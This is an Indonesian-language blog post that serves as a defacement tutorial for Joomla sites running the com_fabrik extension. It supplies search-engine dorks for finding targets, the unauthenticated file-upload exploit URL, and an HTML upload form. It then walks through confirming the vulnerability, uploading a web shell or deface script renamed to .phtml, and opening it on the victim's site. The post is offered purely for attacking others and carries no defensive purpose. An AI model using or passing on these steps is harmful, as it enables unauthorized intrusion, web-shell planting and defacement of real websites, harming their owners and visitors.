Deface POC Com Fabrik


 Hello Guys..Kali ini saya akan memberitahukan 
deface method com_fabrik sama csrf Nih gua buat yg belum tau/belum bisa aj. Yang udah bisa tolong ajari yg belum bisa. Ilmu jangan disimpen sendiri asuu:v
    BAHAN-BAHAN NA TOD
-DORK: inurl:/com_fabrik site:
inurl:viewTable?cid= site:
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:index.php?option=com_fabrik site: (untuk site nya bisa klean tambahin sendiri)
-EXPLOIT: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
*CSRF Comot Noh Bawah:v Note: kalo ga bisa pake csrf yg kaya gini pake csrf online aja yah lebih gampang di google banyak:v 
<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
 <input type="file" name="file" />
 <button>
  Upload
 </button></form>

          LANGKAH-LANGKAH NYA PAK
1. Klean dorking seperti biasanya, (dork ada di atas cok)
2. Lalu buat tes vuln nya kalian tambahin exploitnya. (Exploitnya juga ada diatas cok) Jadinya gini..
https://LINK TARGET.co.li /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
3.Kalo vuln maka akan muncul tulisan : {"filepath":null,"uri":null}
4. Sekarang kalian edit CSRFnya di notepad/text editor, kalian salin target kalian..ganti di bagian action="LINK TARGET/(exploitnya)"
5. Kalo sudah kalian save, buka CSRF di google, nanti akan muncul tombol upload.
6. Lalu kalian upload shell kalian / script deface kalian.. ( jika shellnya .php ubah dulu ke .phtml)
7. Jika berhasil terupload akan muncul tulisan  {"filepath":\/bla bla bla:v "htpps://Target klean.coli/ shell atau sc klean}
Pokoknya muncul gituan dh.
8. Lalu kalian buka dh Http://Link Target.coli/Nama Script Lu.phtml
Dh sekarang tinggal eue tuh web, tapi ingat. Saat dorking dibutuhkan "KESABARAN COOK" kalian tinggal kembangin sendiri Biar Ketemu Yang Masih Perawan:v
Jangan lupa gua titip nick aokwowkowk Phr3ak3r'z_Id10ts404 hahahaha:p Maaf yah kalo masih belum ngerti:v maklum baru bikin blog;v
Good Bye:D
Baca Juga

Post a Comment

2 Comments